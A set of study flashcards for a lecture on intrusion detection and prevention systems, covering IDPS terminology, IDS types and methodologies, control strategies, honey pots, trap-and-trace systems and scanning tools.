Lecture 7 Flashcards
?
is a type of attack on information assets in which the instigator attempts to gain entry into a system or disrupt the normal operation of system with, almost always, the intent to do malicious harm.
Identify
Intrusion
?
activities that deter an intrusion
Identify
Intrusion prevention
?
procedures and systems that identify sys intrusions
Identify
Intrusion detection
?
Activities finalize the restoration of operations to a normal state
Identify
1/2 ?
Intrusion correction
?
Activities seek to identify the source & method of attack for prevention
Identify
2/2 ?
Intrusion correction
?
Intrusion prevention systems
Identify
Intrusion Detection Systems
Extension
?
: indication that attack is happening
Identify
IDPS Terminology
Alarm or alert
?
: attacker change the format and/or timing of activities to avoid being detected
Identify
IDPS Terminology
Evasion
?
: event triggers alarm – no real attack
Identify
IDPS Terminology
False attack stimulus
?
: failure of IDPS to react to attack
Identify
IDPS Terminology
False negative
?
: alarm activates in the absence of an actual attack
Identify
IDPS Terminology
False positive
?
: alarms events that are accurate but do not pose threats
Identify
IDPS Terminology
Noise
?
: rules & configuration guidelines governing the implementation & operation of IDPS
Identify
IDPS Terminology
Site policy
?
: ability to dynamically modify config in response to environmental activity
Identify
IDPS Terminology
Site policy awareness
?
: event that triggers alarms in event of real attack
Identify
IDPS Terminology
True attack stimulus
?
: adjusting an IDPS
Identify
IDPS Terminology
Tuning
?
: measure IDPS ability correctly detect & identify type of attacks
Identify
IDPS Terminology
Confidence value
?
: Classification of IDPS alerts
Identify
IDPS Terminology
Alarm filtering
?
: grouping almost identical alarms happening at close to the same time
Identify
IDPS Terminology
Alarm clustering and compaction
?
Prevent problem behaviors by increasing the perceived risk of discovery and punishment
Identify
1/6 ?
IDS (Intrusion Detection Systems)
?
Detect attacks and other security violations
Identify
2/6 ?
IDS (Intrusion Detection Systems)
?
Detect and deal with preambles to attacks
Identify
3/6 ?
IDS (Intrusion Detection Systems)
?
Document existing threat to an organization
Identify
4/6 ?
IDS (Intrusion Detection Systems)
?
Act as quality control for security design & administration
Identify
5/6 ?
IDS (Intrusion Detection Systems)
?
Provide useful information about intrusions that take place
Identify
6/6 ?
IDS (Intrusion Detection Systems)
? ??
(2) Types of IDS
Enumerate
- Network based
- Hot-based
?
- Focused on protection network information assets
- Wireless
- Network behavior analysis
Identify
1/2 Types of IDS
Network based
?
Focused on protection server of host’s information assets
Identify
2/2 Types of IDS
Host-based
?
Resides on computer or appliance connected to an a segment of orgs. network
Identify
Types of IDS - 1/6 ?
Network-Based
?
Monitors network traffic on the segment
Identify
Types of IDS - 2/6 ?
Network-Based
?
Monitors packets
Identify
Types of IDS - 3/6 ?
Network-Based
?
Monitoring port (switched port analysis)
Identify
Types of IDS - 4/6 ?
Network-Based
?
Looks for attack patterns
Identify
Types of IDS - 5/6 ?
Network-Based
?
Compares measured activity to known signatures
Identify
Types of IDS - 6/6 ?
Network-Based
?
packet structure
Identify
Types of IDS - Compares measured activity to known signatures - 1/2 ?
Protocol verification
?
packet use
Identify
Types of IDS - Compares measured activity to known signatures - 1/2 ?
Application verification
? ??
(2) Forms of attack that are not easily discerned
Enumerate
- Fragmented packets
- Malformed packets
?
Monitors and analyzes wireless network traffic
Identify
1/3 ?
Wireless NIDPS
?
Looks for potential problems with the wireless protocols
Identify
2/3 ?
Wireless NIDPS
?
Cannot evaluate & diagnose issue with higher level layers
Identify
3/3 ?
Wireless NIDPS
? ?? ??? ???? ?????
(5) Issues associated with implementation
Enumerate
Wireless NIDPS
- Physical security
- Sensor range
- Access point and wireless switch locations
- Wired network connections
- Cost
?
Resides on a particular computer or server & monitors traffic only on that system
Identify
Types of IDS - 1/6 ?
Host-Based
?
Resides on a particular computer or server & monitors traffic only on that system
Identify
Types of IDS - 1/6 ?
Host-Based
?
Also known as system integrity verifiers
Identify
Types of IDS - 2/6 ?
Host-Based
?
Works on principle of configuration and change management
Identify
Types of IDS - 3/6 ?
Host-Based
?
Classifies files in categories & applies various notification actions based on rules
Identify
Types of IDS - 4/6 ?
Host-Based
?
Maintains own log file
Identify
Types of IDS - 5/6 ?
Host-Based
?
Can monitor multiple computers simultaneously
Identify
Types of IDS - 6/6 ?
Host-Based
?
Examines application for abnormal events
Identify
1/5 ?
Application Based
?
Tracks interaction between users and applications
Identify
2/5 ?
Application Based
?
Able to tract specific activity back to individual user
Identify
3/5 ?
Application Based
?
Able to view encrypted data
Identify
4/5 ?
Application Based
?
Can examine encryption/decryption process
Identify
5/5 ?
Application Based
?
Two dominate methodologies
Identify
IDS Methodologies
- Signature-based (knowledge-based)
- Statistical-anomaly approach
?
- Examines data traffic in search of patterns that match known signature
- Widely used
- Signature database must be continually updated
- Attack time-frame sometimes problematic
Identify
1/2 IDS Methodologies
Signature Based
?
Based on frequency on which network activities take place
Identify
2/2 IDS Methodologies 1/7 ?
Statistical Anomaly Based
?
Collect statistical summaries of “normal” traffic to form baseline
Identify
2/2 IDS Methodologies 2/7 ?
Statistical Anomaly Based
?
Measure current traffic against baseline
Identify
2/2 IDS Methodologies 3/7 ?
Statistical Anomaly Based
?
Traffic outside baseline will generate alert
Identify
2/2 IDS Methodologies 4/7 ?
Statistical Anomaly Based
?
Can detect new type of attacks
Identify
2/2 IDS Methodologies 5/7 ?
Statistical Anomaly Based
?
Requires much more overhead and processing capacity
Identify
2/2 IDS Methodologies 6/7 ?
Statistical Anomaly Based
?
May not detect minor changes to baseline
Identify
2/2 IDS Methodologies 7/7 ?
Statistical Anomaly Based
?
Similar to NIDS
Identify
1/5 ?
Log file Monitors
?
Reviews logs
Identify
2/5 ?
Log file Monitors
?
Looks for patterns & signatures in log files
Identify
3/5 ?
Log file Monitors
?
Able to look at multiple log files from different systems
Identify
4/5 ?
Log file Monitors
?
Large storage requirement
Identify
5/5 ?
Log file Monitors
?
Vary according to organization policy, objectives, and system capabilities
Identify
1/3 ?
Responses to IDS
?
Administrator must be careful not to increase the problem
Identify
2/3 ?
Responses to IDS
?
Responses active or passive
Identify
3/3 ?
Responses to IDS
? ?? ???
(3) Control Strategies
Enumerate
- Centralized
- Partially distributed
- Fully distributed
?
- All IDS control functions are implemented and managed in a centralized location
- 1 management system
Identify
1/3 Control Strategies
Centralized
?
Opposite of centralized
Identify
2/3 Control Strategies 1/3 ?
Fully Distributed
?
All control functions applied at the physical location of each IDS component
Identify
2/3 Control Strategies 2/3 ?
Fully Distributed
?
- Each sensor/agent is best configured to deal with its own environment
- Reaction to attacks sped up
Identify
2/3 Control Strategies 3/3 ?
Fully Distributed
?
Individual agents respond to local threats
Identify
3/3 Control Strategies 1/3 ?
Partially Distributed Control
?
Report to a hierarchical central facility
Identify
3/3 Control Strategies 2/3 ?
Partially Distributed Control
?
One of the more effective methods
Identify
3/3 Control Strategies 3/3 ?
Partially Distributed Control
?
Decoy systems
Identify
1/3 ?
Honey Pots
?
Lure potential attackers away from critical systems
Identify
2/3 ?
Honey Pots
?
Encourages attacks against themselves
Identify
3/3 ?
Honey Pots
?
Collection of honey pots
Identify
1/4 ?
Honey Net
?
Connects honey pots on a subnet
Identify
2/4 ?
Honey Net
?
Contains pseudo-services the emulated well-known services
Identify
3/4 ?
Honey Net
?
Filled with factious information
Identify
4/4 ?
Honey Net
?
Protected honey pot
Identify
1/3 ?
Padded Cell
?
IDS detects attacks and transfers to simulated environment
Identify
2/3 ?
Padded Cell
?
Monitors action of attacker
Identify
3/3 ?
Padded Cell
?
Detect intrusion and trace incident back
Identify
1/3 ?
Trap and Trace Systems
?
Consist of honey pot or padded cell & alarm
Identify
2/3 ?
Trap and Trace Systems
?
Similar to concept of caller ID
Identify
3/3 ?
Trap and Trace Systems
?
Considered unethical
Identify
Trap and Trace Systems
Back-hack
?
Legal drawbacks to trap and trace
Identify
Trap and Trace Systems
Enticement and entrapment
?
Help find vulnerabilities in system, holes in security components, and unsecure aspects of the network
Identify
1/3 ?
Scanning and Analysis Tools
?
Allow system admin to see what the attacker sees
Identify
2/3 ?
Scanning and Analysis Tools
?
May run into problems with ISP
Identify
3/3 ?
Scanning and Analysis Tools
? ?? ??? ???? ?????
(5) Scanning and Analysis Tools
Enumerate
Scanning and Analysis Tools
- Port scanners
- Firewall analysis tools
- Operating system detection tools
- Vulnerability scanners
- Packet sniffers
?
– validation of users identity
Identify
Access Control Tools
Authentication
? ?? ??? ????
4 general ways carried out
Enumerate
Access Control Tools
- What he knows
- What he has
- Who he is
- What he produces